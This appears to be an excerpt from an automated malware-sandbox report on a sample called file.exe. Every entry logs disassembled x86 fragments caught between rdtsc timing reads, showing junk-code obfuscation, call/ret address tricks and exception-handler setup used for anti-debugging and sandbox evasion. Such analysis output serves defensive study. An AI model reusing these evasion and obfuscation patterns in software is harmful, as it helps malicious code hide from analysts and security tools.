Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE2985 second address: AE298B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE3356 second address: AE335A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE335A second address: AE336E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1CB4F79646h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnc 00007F1CB4F79648h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE336E second address: AE3397 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CB4FA4D1Ch 0x00000009 jmp 00007F1CB4FA4D29h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE3397 second address: AE33AE instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1CB4F79646h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f jg 00007F1CB4F7964Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE7C47 second address: AE7C4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE7C4B second address: AE7C6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jc 00007F1CB4F79646h 0x00000010 push edx 0x00000011 pop edx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 jmp 00007F1CB4F7964Dh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE7C6F second address: AE7C79 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1CB4FA4D2Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AEE4C6 second address: AEE4CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AEE92F second address: AEE939 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1CB4FA4D16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AEEEC5 second address: AEEED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jp 00007F1CB4F7964Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AEEED9 second address: AEEEDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF1496 second address: AF149A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF1893 second address: AF1898 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF1B79 second address: AF1B7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF2012 second address: AF2019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF2019 second address: AF2056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp], ebx 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F1CB4F79648h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 mov edi, dword ptr [ebp+122D2BD9h] 0x0000002b push eax 0x0000002c jo 00007F1CB4F79654h 0x00000032 push eax 0x00000033 push edx 0x00000034 jnl 00007F1CB4F79646h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF252B second address: AF253D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F1CB4FA4D18h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF25C0 second address: AF25C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF2AD2 second address: AF2AD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF2AD7 second address: AF2ADD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF2ADD second address: AF2B20 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1CB4FA4D16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F1CB4FA4D18h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 push 00000000h 0x00000029 sub dword ptr [ebp+122D1D2Bh], esi 0x0000002f push 00000000h 0x00000031 add esi, 2AAAAF9Ah 0x00000037 xchg eax, ebx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF2B20 second address: AF2B26 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF2B26 second address: AF2B48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F1CB4FA4D24h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF4EA6 second address: AF4EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF59EF second address: AF59F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF59F4 second address: AF5A38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov si, 4065h 0x0000000e push 00000000h 0x00000010 pushad 0x00000011 mov ebx, esi 0x00000013 xor dword ptr [ebp+122D2937h], ebx 0x00000019 popad 0x0000001a push 00000000h 0x0000001c mov dword ptr [ebp+122D39E3h], esi 0x00000022 mov edi, dword ptr [ebp+122D1C2Dh] 0x00000028 xchg eax, ebx 0x00000029 push ebx 0x0000002a jmp 00007F1CB4F7964Dh 0x0000002f pop ebx 0x00000030 push eax 0x00000031 jo 00007F1CB4F79650h 0x00000037 pushad 0x00000038 push ebx 0x00000039 pop ebx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF6297 second address: AF62A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F1CB4FA4D16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF62A1 second address: AF632C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F1CB4F79659h 0x0000000e nop 0x0000000f and esi, dword ptr [ebp+122D2CADh] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007F1CB4F79648h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 mov edi, dword ptr [ebp+122D315Fh] 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ebp 0x0000003c call 00007F1CB4F79648h 0x00000041 pop ebp 0x00000042 mov dword ptr [esp+04h], ebp 0x00000046 add dword ptr [esp+04h], 0000001Dh 0x0000004e inc ebp 0x0000004f push ebp 0x00000050 ret 0x00000051 pop ebp 0x00000052 ret 0x00000053 xchg eax, ebx 0x00000054 push eax 0x00000055 push edx 0x00000056 jc 00007F1CB4F79653h 0x0000005c jmp 00007F1CB4F7964Dh 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF6B17 second address: AF6B21 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1CB4FA4D16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF94DD second address: AF94E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFA2BB second address: AFA2DE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F1CB4FA4D22h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jo 00007F1CB4FA4D16h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFA2DE second address: AFA2F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F1CB4F7964Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFA752 second address: AFA757 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFA757 second address: AFA765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFA765 second address: AFA769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFA769 second address: AFA778 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4F7964Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFA778 second address: AFA7D3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1CB4FA4D1Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov ebx, 1E029FF8h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007F1CB4FA4D18h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c movzx ebx, cx 0x0000002f push 00000000h 0x00000031 movsx edi, si 0x00000034 xchg eax, esi 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F1CB4FA4D29h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFA7D3 second address: AFA7DD instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1CB4F79646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFA7DD second address: AFA7E2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFBBCA second address: AFBBD4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1CB4F79646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFDB20 second address: AFDB24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFBBD4 second address: AFBBDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F1CB4F79646h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFDB24 second address: AFDB41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F1CB4FA4D1Eh 0x0000000c pop eax 0x0000000d popad 0x0000000e push eax 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFDB41 second address: AFDBF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4F79654h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a nop 0x0000000b mov ebx, dword ptr [ebp+122D2D2Dh] 0x00000011 jmp 00007F1CB4F7964Bh 0x00000016 push dword ptr fs:[00000000h] 0x0000001d clc 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 ja 00007F1CB4F79657h 0x0000002b movsx edi, dx 0x0000002e mov eax, dword ptr [ebp+122D0799h] 0x00000034 push 00000000h 0x00000036 push ebp 0x00000037 call 00007F1CB4F79648h 0x0000003c pop ebp 0x0000003d mov dword ptr [esp+04h], ebp 0x00000041 add dword ptr [esp+04h], 00000019h 0x00000049 inc ebp 0x0000004a push ebp 0x0000004b ret 0x0000004c pop ebp 0x0000004d ret 0x0000004e js 00007F1CB4F7964Bh 0x00000054 adc bx, 1245h 0x00000059 mov bx, 106Fh 0x0000005d push FFFFFFFFh 0x0000005f and ebx, dword ptr [ebp+122D2E01h] 0x00000065 nop 0x00000066 jnp 00007F1CB4F7966Ah 0x0000006c push eax 0x0000006d push edx 0x0000006e jmp 00007F1CB4F79658h 0x00000073 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFFA40 second address: AFFA45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFDBF4 second address: AFDBF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B008C4 second address: B008DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CB4FA4D24h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFFA45 second address: AFFA4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F1CB4F79646h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFDBF8 second address: AFDC0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jc 00007F1CB4FA4D28h 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F1CB4FA4D16h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B008DC second address: B008E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFFA4F second address: AFFA53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B046F8 second address: B046FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B046FE second address: B04748 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1CB4FA4D16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov edi, dword ptr [ebp+122D2D39h] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007F1CB4FA4D18h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000016h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 jbe 00007F1CB4FA4D18h 0x00000037 mov edi, edx 0x00000039 push 00000000h 0x0000003b clc 0x0000003c mov di, dx 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 push esi 0x00000043 pushad 0x00000044 popad 0x00000045 pop esi 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B04748 second address: B0474E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0474E second address: B04752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB7FFE second address: AB8002 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB8002 second address: AB8029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F1CB4FA4D1Fh 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f popad 0x00000010 jng 00007F1CB4FA4D28h 0x00000016 pushad 0x00000017 push edx 0x00000018 pop edx 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB8029 second address: AB802F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B07D4B second address: B07D50 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0390B second address: B03910 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B03910 second address: B03916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B05911 second address: B0591B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1CB4F79646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0591B second address: B0593D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4FA4D28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B08FAA second address: B08FBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4F79651h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B08FBF second address: B08FD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CB4FA4D23h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0AD8C second address: B0AD9C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1CB4F79646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0AD9C second address: B0ADA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B09E19 second address: B09E1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0AF3F second address: B0AFB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ebx 0x00000009 call 00007F1CB4FA4D18h 0x0000000e pop ebx 0x0000000f mov dword ptr [esp+04h], ebx 0x00000013 add dword ptr [esp+04h], 00000014h 0x0000001b inc ebx 0x0000001c push ebx 0x0000001d ret 0x0000001e pop ebx 0x0000001f ret 0x00000020 push dword ptr fs:[00000000h] 0x00000027 mov dword ptr fs:[00000000h], esp 0x0000002e add dword ptr [ebp+122D187Ch], eax 0x00000034 mov eax, dword ptr [ebp+122D0891h] 0x0000003a mov dword ptr [ebp+122D1E06h], ebx 0x00000040 or dword ptr [ebp+12479DF1h], ecx 0x00000046 push FFFFFFFFh 0x00000048 push 00000000h 0x0000004a push eax 0x0000004b call 00007F1CB4FA4D18h 0x00000050 pop eax 0x00000051 mov dword ptr [esp+04h], eax 0x00000055 add dword ptr [esp+04h], 0000001Dh 0x0000005d inc eax 0x0000005e push eax 0x0000005f ret 0x00000060 pop eax 0x00000061 ret 0x00000062 mov ebx, dword ptr [ebp+122D2C21h] 0x00000068 push eax 0x00000069 push eax 0x0000006a push eax 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0F115 second address: B0F143 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1CB4F79646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F1CB4F79652h 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 jmp 00007F1CB4F7964Bh 0x00000017 push eax 0x00000018 push edx 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B13F4D second address: B13F51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B13F51 second address: B13F57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B14088 second address: B1408C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1408C second address: B14092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B14092 second address: B14098 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B14098 second address: B140B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CB4F79654h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B140B0 second address: B140B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1420E second address: B14212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B14212 second address: B14226 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1CB4FA4D16h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnl 00007F1CB4FA4D22h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB9B59 second address: AB9B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB9B5F second address: AB9B63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB9B63 second address: AB9B85 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1CB4F79646h 0x00000008 jmp 00007F1CB4F7964Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jg 00007F1CB4F79646h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B19E6B second address: B19E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1DC20 second address: B1DC2A instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1CB4F79646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1DD46 second address: B1DD61 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F1CB4FA4D20h 0x00000010 rdtsc
